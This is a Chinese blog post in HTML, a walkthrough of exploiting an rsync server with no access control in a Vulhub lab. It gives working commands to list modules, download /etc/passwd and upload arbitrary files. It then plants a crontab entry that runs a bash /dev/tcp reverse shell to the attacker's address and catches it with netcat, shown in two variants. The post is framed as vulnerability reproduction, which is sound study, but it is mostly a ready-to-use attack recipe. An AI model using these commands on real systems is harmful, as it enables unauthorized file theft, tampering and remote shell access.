

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#ccccff">
  <meta name="author" content="echozt">
  <meta name="keywords" content="网络安全，计算机，渗透">
  
    <meta name="description" content="关于rsync服务未授权漏洞的几种利用方式~~">
<meta property="og:type" content="article">
<meta property="og:title" content="rsync未授权访问漏洞利用">
<meta property="og:url" content="https://echozt.github.io/posts/7e0e.html">
<meta property="og:site_name" content="echozt">
<meta property="og:description" content="关于rsync服务未授权漏洞的几种利用方式~~">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://echozt.github.io/posts/undefined/3.png">
<meta property="og:image" content="https://echozt.github.io/posts/undefined/3_2.png">
<meta property="og:image" content="https://echozt.github.io/posts/undefined/3_3.png">
<meta property="og:image" content="https://echozt.github.io/posts/undefined/4.png">
<meta property="og:image" content="https://echozt.github.io/posts/undefined/4_2.png">
<meta property="og:image" content="https://echozt.github.io/posts/undefined/5.png">
<meta property="og:image" content="https://echozt.github.io/posts/undefined/5_2.png">
<meta property="og:image" content="https://echozt.github.io/posts/undefined/6.png">
<meta property="og:image" content="https://echozt.github.io/posts/undefined/6_2.png">
<meta property="og:image" content="https://echozt.github.io/posts/undefined/6_3.png">
<meta property="og:image" content="https://echozt.github.io/posts/undefined/6_4.png">
<meta property="og:image" content="https://echozt.github.io/posts/undefined/7.png">
<meta property="og:image" content="https://echozt.github.io/posts/undefined/7_2.png">
<meta property="og:image" content="https://echozt.github.io/posts/undefined/7_3.png">
<meta property="og:image" content="https://echozt.github.io/posts/undefined/7_4.png">
<meta property="og:image" content="https://echozt.github.io/posts/undefined/7_5.png">
<meta property="og:image" content="https://echozt.github.io/posts/undefined/7_6.png">
<meta property="og:image" content="https://echozt.github.io/posts/undefined/7_7.png">
<meta property="og:image" content="https://echozt.github.io/posts/undefined/7_8.png">
<meta property="og:image" content="https://echozt.github.io/posts/undefined/7_9.png">
<meta property="article:published_time" content="2022-12-06T08:18:17.000Z">
<meta property="article:modified_time" content="2022-12-06T08:48:29.193Z">
<meta property="article:author" content="echozt">
<meta property="article:tag" content="未授权访问">
<meta property="article:tag" content="任意文件上传">
<meta property="article:tag" content="任意文件下载">
<meta property="article:tag" content="计划任务反弹shell">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://echozt.github.io/posts/undefined/3.png">
  
  
  <title>rsync未授权访问漏洞利用 - echozt</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hint.css@2/hint.min.css" />

  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->

  
<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/bynotes/texiao/source/css/toubudaziji.css">
<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/bynotes/texiao/source/css/daziyanse.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"echozt.github.io","root":"/","version":"1.8.14","typing":{"enable":true,"typeSpeed":100,"cursorChar":"_","loop":true},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.1"><link rel="alternate" href="/atom.xml" title="echozt" type="application/atom+xml">
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>echozt&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default2.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="rsync未授权访问漏洞利用">
              
            </span>

            
              <div class="mt-3">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-author" aria-hidden="true"></i>
      echozt
    </span>
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-12-06 16:18" pubdate>
        2022年12月6日 下午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      2.2k 字
    </span>
  

  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">rsync未授权访问漏洞利用</h1>
            
            <div class="markdown-body">
              <p>关于rsync服务未授权漏洞的几种利用方式~~</p>
<span id="more"></span>

<h1 id="00x0-前言"><a href="#00x0-前言" class="headerlink" title="00x0 前言"></a>00x0 前言</h1><p>环境：</p>
<blockquote>
<p>Ubuntu：192.168.25.129（靶机）</p>
<p>kali：192.168.25.128（攻击机）</p>
</blockquote>
<p>在Ubuntu上启动rsync的docker环境：</p>
<p>    进入环境：cd vulhub/rsync/common </p>
<p>    自动编译环境：sudo docker-compose build </p>
<p>    启动整个环境：sudo docker-compose up -d </p>
<p>    最后实验完成时删除整个环境：sudo docker-compose down -v</p>
<h1 id="00x1-漏洞介绍"><a href="#00x1-漏洞介绍" class="headerlink" title="00x1 漏洞介绍"></a>00x1 漏洞介绍</h1><p>    rsync是Linux下一款数据备份工具，支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口，如果目标开启了rsync服务，并且没有配置ACL或访问密码，我们将可以读写目标服务器文件。</p>
<h1 id="00x2-常用命令"><a href="#00x2-常用命令" class="headerlink" title="00x2 常用命令"></a>00x2 常用命令</h1><h3 id="（1）查看服务器目录"><a href="#（1）查看服务器目录" class="headerlink" title="（1）查看服务器目录"></a>（1）查看服务器目录</h3><pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">rsync</span> ip:: （rsync默认端口873）

<span class="token function">rsync</span> --port<span class="token operator">=</span>xxx ip:: （rsync指定了其他端口）
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<h3 id="（2）查看服务器目录下的文件"><a href="#（2）查看服务器目录下的文件" class="headerlink" title="（2）查看服务器目录下的文件"></a>（2）查看服务器目录下的文件</h3><pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">rsync</span> ip::目录名
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h3 id="（3）上传文件"><a href="#（3）上传文件" class="headerlink" title="（3）上传文件"></a>（3）上传文件</h3><pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">rsync</span> -av <span class="token operator">&lt;</span>需要上传的文件<span class="token operator">></span> ip::上传文件路径
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h3 id="（4）下载文件"><a href="#（4）下载文件" class="headerlink" title="（4）下载文件"></a>（4）下载文件</h3><pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">rsync</span> -av ip::下载文件路径 <span class="token operator">&lt;</span>下载文件存放的路径<span class="token operator">></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h1 id="00x3-漏洞验证"><a href="#00x3-漏洞验证" class="headerlink" title="00x3 漏洞验证"></a>00x3 漏洞验证</h1><h3 id="1、在kali上扫描靶机端口，可以看到873端口开放"><a href="#1、在kali上扫描靶机端口，可以看到873端口开放" class="headerlink" title="1、在kali上扫描靶机端口，可以看到873端口开放"></a>1、在kali上扫描靶机端口，可以看到873端口开放</h3><pre class="line-numbers language-bash"><code class="language-bash">nmap -sS 192.158.25.129
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<img src="/posts/undefined/3.png" srcset="/img/loading.gif" lazyload class>

<h3 id="2、查看目录，若能查看到目录，则说明漏洞存在"><a href="#2、查看目录，若能查看到目录，则说明漏洞存在" class="headerlink" title="2、查看目录，若能查看到目录，则说明漏洞存在"></a>2、查看目录，若能查看到目录，则说明漏洞存在</h3><pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">rsync</span> 192.168.25.129::
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<img src="/posts/undefined/3_2.png" srcset="/img/loading.gif" lazyload class>

<h3 id="3、查看目录下的文件"><a href="#3、查看目录下的文件" class="headerlink" title="3、查看目录下的文件"></a>3、查看目录下的文件</h3><pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">rsync</span> 192.168.25.129::src
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<img src="/posts/undefined/3_3.png" srcset="/img/loading.gif" lazyload class>

<h1 id="00x4-漏洞利用——任意文件下载"><a href="#00x4-漏洞利用——任意文件下载" class="headerlink" title="00x4 漏洞利用——任意文件下载"></a>00x4 漏洞利用——任意文件下载</h1><h3 id="1、下载目标靶机的任意文件，这里下载etc-passwd文件"><a href="#1、下载目标靶机的任意文件，这里下载etc-passwd文件" class="headerlink" title="1、下载目标靶机的任意文件，这里下载etc/passwd文件"></a>1、下载目标靶机的任意文件，这里下载etc/passwd文件</h3><pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">rsync</span> -av 192.168.25.129::src/etc/passwd /tmp

（src/etc/passwd是目标内容，/tmp是自己指定存储在本地的路径）
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<img src="/posts/undefined/4.png" srcset="/img/loading.gif" lazyload class>

<h3 id="2、查看下载的文件"><a href="#2、查看下载的文件" class="headerlink" title="2、查看下载的文件"></a>2、查看下载的文件</h3><pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">cat</span> /tmp/passwd
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<img src="/posts/undefined/4_2.png" srcset="/img/loading.gif" lazyload class>

<h1 id="00x5-漏洞利用——任意文件上传"><a href="#00x5-漏洞利用——任意文件上传" class="headerlink" title="00x5 漏洞利用——任意文件上传"></a>00x5 漏洞利用——任意文件上传</h1><h3 id="1、上传任意文件到目标靶机"><a href="#1、上传任意文件到目标靶机" class="headerlink" title="1、上传任意文件到目标靶机"></a>1、上传任意文件到目标靶机</h3><pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">rsync</span> -av /home/kali/a.txt 192.168.25.129::src/tmp/a.txt

（/home/kali/a.txt是攻击机上的文件路径，src/tmp/a.txt是指要上传到目标靶机的路径）
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p> <img src="/posts/undefined/5.png" srcset="/img/loading.gif" lazyload class></p>
<h3 id="2、查看是否上传成功"><a href="#2、查看是否上传成功" class="headerlink" title="2、查看是否上传成功"></a>2、查看是否上传成功</h3><pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">rsync</span> 192.168.25.129::src/tmp/
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p> <img src="/posts/undefined/5_2.png" srcset="/img/loading.gif" lazyload class></p>
<h1 id="00x6-漏洞利用——利用计划任务反弹shell"><a href="#00x6-漏洞利用——利用计划任务反弹shell" class="headerlink" title="00x6 漏洞利用——利用计划任务反弹shell"></a>00x6 漏洞利用——利用计划任务反弹shell</h1><h2 id="方法一："><a href="#方法一：" class="headerlink" title="方法一："></a>方法一：</h2><p>整体思路：</p>
<p>（1）下载靶机的系统计划任务文件（目录为/etc/crontab）</p>
<p>（2）修改下载好的计划任务文件，将命令写入其中</p>
<p>（3）开启监听端口</p>
<p>（4）将修改好的计划任务crontab文件传回到靶机</p>
<h3 id="1、下载Ubuntu靶机的系统计划任务文件到kali的root目录下"><a href="#1、下载Ubuntu靶机的系统计划任务文件到kali的root目录下" class="headerlink" title="1、下载Ubuntu靶机的系统计划任务文件到kali的root目录下"></a>1、下载Ubuntu靶机的系统计划任务文件到kali的root目录下</h3><pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">rsync</span> -av 192.168.25.129::src/etc/crontab /root
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<img src="/posts/undefined/6.png" srcset="/img/loading.gif" lazyload class>

<h3 id="2、在下载好的crontab中写入计划任务"><a href="#2、在下载好的crontab中写入计划任务" class="headerlink" title="2、在下载好的crontab中写入计划任务"></a>2、在下载好的crontab中写入计划任务</h3><pre class="line-numbers language-bash"><code class="language-bash">*/1 * * * * root <span class="token function">bash</span> -c <span class="token string">"bash -i >&amp; /dev/tcp/192.168.25.128/11111 0>&amp;1"</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<img src="/posts/undefined/6_2.png" srcset="/img/loading.gif" lazyload class>

<h3 id="3、在kali上开启监听端口"><a href="#3、在kali上开启监听端口" class="headerlink" title="3、在kali上开启监听端口"></a>3、在kali上开启监听端口</h3><pre class="line-numbers language-bash"><code class="language-bash">nc -lvnp 11111
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h3 id="4、将修改好的crontab文件传回到靶机系统计划任务目录-etc-crontab中"><a href="#4、将修改好的crontab文件传回到靶机系统计划任务目录-etc-crontab中" class="headerlink" title="4、将修改好的crontab文件传回到靶机系统计划任务目录/etc/crontab中"></a>4、将修改好的crontab文件传回到靶机系统计划任务目录/etc/crontab中</h3><pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">rsync</span> -av <span class="token function">crontab</span> 192.168.25.129::src/etc/crontab
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<img src="/posts/undefined/6_3.png" srcset="/img/loading.gif" lazyload class>

<h3 id="5、反弹shell成功"><a href="#5、反弹shell成功" class="headerlink" title="5、反弹shell成功"></a>5、反弹shell成功</h3><img src="/posts/undefined/6_4.png" srcset="/img/loading.gif" lazyload class>

<h2 id="方法二："><a href="#方法二：" class="headerlink" title="方法二："></a>方法二：</h2><p>    利用方法一就好了，方法二跟方法一差不多，就是将反弹命令写入到sh文件了。</p>
<p>整体思路：</p>
<p>（1）创建一个sh文件，写入反弹shell命令并赋予执行权限</p>
<p>（2）将sh文件上传到靶机</p>
<p>（3）下载靶机的系统计划任务文件（目录为/etc/crontab）</p>
<p>（4）修改下载好的计划任务文件，将命令写入其中</p>
<p>（5）开启监听端口</p>
<p>（6）将修改好的计划任务crontab文件传回到靶机</p>
<h3 id="1、新建一个文件111-sh写入反弹shell命令"><a href="#1、新建一个文件111-sh写入反弹shell命令" class="headerlink" title="1、新建一个文件111.sh写入反弹shell命令"></a>1、新建一个文件111.sh写入反弹shell命令</h3><pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">bash</span> -c <span class="token string">"bash -i >&amp; /dev/tcp/192.168.25.128/9999 0>&amp;1"</span>

（其中192.168.25.128是监听ip，即攻击者ip，9999为监听端口）

查看是否写入成功：cat 111.sh
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<img src="/posts/undefined/7.png" srcset="/img/loading.gif" lazyload class>

<h3 id="2、赋予执行权限"><a href="#2、赋予执行权限" class="headerlink" title="2、赋予执行权限"></a>2、赋予执行权限</h3><pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">chmod</span> +x 111l.sh

查看权限是否赋予成功：ls -l 111s.sh
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<img src="/posts/undefined/7_2.png" srcset="/img/loading.gif" lazyload class>

<h3 id="3、将反弹shell文件上传到攻击者目录下"><a href="#3、将反弹shell文件上传到攻击者目录下" class="headerlink" title="3、将反弹shell文件上传到攻击者目录下"></a>3、将反弹shell文件上传到攻击者目录下</h3><pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">rsync</span> -av 111.sh 192.168.25.129::src/tmp/111.sh
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<img src="/posts/undefined/7_3.png" srcset="/img/loading.gif" lazyload class>

<h3 id="4、查看是否上传成功"><a href="#4、查看是否上传成功" class="headerlink" title="4、查看是否上传成功"></a>4、查看是否上传成功</h3><pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">rsync</span> 192.168.25.129::src/tmp/
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<img src="/posts/undefined/7_4.png" srcset="/img/loading.gif" lazyload class>

<h3 id="5、下载对方定时任务文件crontab到-root目录下"><a href="#5、下载对方定时任务文件crontab到-root目录下" class="headerlink" title="5、下载对方定时任务文件crontab到/root目录下"></a>5、下载对方定时任务文件crontab到/root目录下</h3><pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">rsync</span> -av 192.168.25.129::src/etc/crontab /root
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<img src="/posts/undefined/7_5.png" srcset="/img/loading.gif" lazyload class>

<h3 id="6、在crontab文件末尾写入命令"><a href="#6、在crontab文件末尾写入命令" class="headerlink" title="6、在crontab文件末尾写入命令"></a>6、在crontab文件末尾写入命令</h3><pre class="line-numbers language-bash"><code class="language-bash">*/1 * * * * root /tmp/111.sh
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>    保存并退出</p>
<img src="/posts/undefined/7_6.png" srcset="/img/loading.gif" lazyload class>

<h3 id="7、设置监听端口"><a href="#7、设置监听端口" class="headerlink" title="7、设置监听端口"></a>7、设置监听端口</h3><p>    在kali上另外开一个命令行窗口，监听9999端口：nc -lvnp 9999</p>
<img src="/posts/undefined/7_7.png" srcset="/img/loading.gif" lazyload class>

<h3 id="8、将crontab文件上传到目标靶机"><a href="#8、将crontab文件上传到目标靶机" class="headerlink" title="8、将crontab文件上传到目标靶机"></a>8、将crontab文件上传到目标靶机</h3><pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">rsync</span> -av <span class="token function">crontab</span> 192.168.25.129::src/etc/crontab
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<img src="/posts/undefined/7_8.png" srcset="/img/loading.gif" lazyload class>

<h3 id="9、在监听端口处可以看到成功获得反弹shell"><a href="#9、在监听端口处可以看到成功获得反弹shell" class="headerlink" title="9、在监听端口处可以看到成功获得反弹shell"></a>9、在监听端口处可以看到成功获得反弹shell</h3><img src="/posts/undefined/7_9.png" srcset="/img/loading.gif" lazyload class>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">漏洞复现</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE/">未授权访问</a>
                    
                      <a class="hover-with-bg" href="/tags/%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/">任意文件上传</a>
                    
                      <a class="hover-with-bg" href="/tags/%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD/">任意文件下载</a>
                    
                      <a class="hover-with-bg" href="/tags/%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E5%8F%8D%E5%BC%B9shell/">计划任务反弹shell</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/posts/192.html">
                        <span class="hidden-mobile">反弹shell与计划任务</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  





  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
        typing(title);
      
    })(window, document);
  </script>














  
<script src="//cdn.jsdelivr.net/gh/bynotes/texiao/source/js/dianjichuzi.js"></script>
<script src="//cdn.jsdelivr.net/gh/bynotes/texiao/source/js/xiantiao.js"></script>
<script src="//cdn.jsdelivr.net/gh/bynotes/texiao/source/js/timeDate.js"></script>



<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
